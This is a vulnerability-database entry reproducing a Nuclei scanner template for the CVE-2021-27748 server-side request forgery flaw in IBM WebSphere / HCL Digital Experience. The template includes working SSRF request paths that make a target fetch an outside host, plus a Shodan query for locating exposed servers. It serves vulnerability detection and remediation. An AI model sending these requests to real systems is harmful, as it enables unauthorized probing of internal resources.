Lucene search
K

IBM WebSphere HCL Digital Experience - Server-Side Request Forgery

🗓️ 04 Feb 2026 07:00:26Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 128 Views

IBM WebSphere HCL Digital Experience - Server-Side Request Forgery, CVE-2021-27748. Vulnerable to SSRF impacting on-premise deployments, allowing access to internal resources, and bypassing security controls

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2021-27748
27 Apr 202309:58
circl
CVE
CVE-2021-27748
18 Nov 202321:50
cve
NCSC
Vulnerabilities fixed in HCL Technologies Digital Experience
4 Jan 202200:00
ncsc
id: CVE-2021-27748

info:
  name: IBM WebSphere HCL Digital Experience - Server-Side Request Forgery
  author: pdteam
  severity: high
  description: |
    IBM WebSphere HCL Digital Experience is vulnerable to server-side request forgery that impacts on-premise deployments and containers.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to bypass security controls, access internal resources, and potentially perform further attacks.
  remediation: |
    Apply the latest security patches or updates provided by IBM to mitigate this vulnerability.
  reference:
    - https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/
    - https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0095665
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27748
  classification:
    cve-id: CVE-2021-27748
    cpe: cpe:2.3:a:ibm:websphere:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    shodan-query: http.html:"IBM WebSphere Portal"
    product: websphere
    vendor: ibm
  tags: cve2021,cve,hcl,ibm,ssrf,websphere,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 2
    matchers:
      - type: word
        internal: true
        words:
          - "IBM WebSphere Portal"

  - method: GET
    path:
      - '{{BaseURL}}/docpicker/internal_proxy/http/oast.me'
      - '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/oast.me'

    host-redirects: true
    max-redirects: 2
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Interactsh Server"
# digest: 4a0a00473045022100879ffad1d5c529ce2700ceaf122f731ab4cbbb5645b02da6626dadccb3d0bec302203a58377451d4bf63c70abbbf1cb8bed00634004c7ef944a51876a4992609239e:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.6Medium risk
Vulners AI Score5.6
128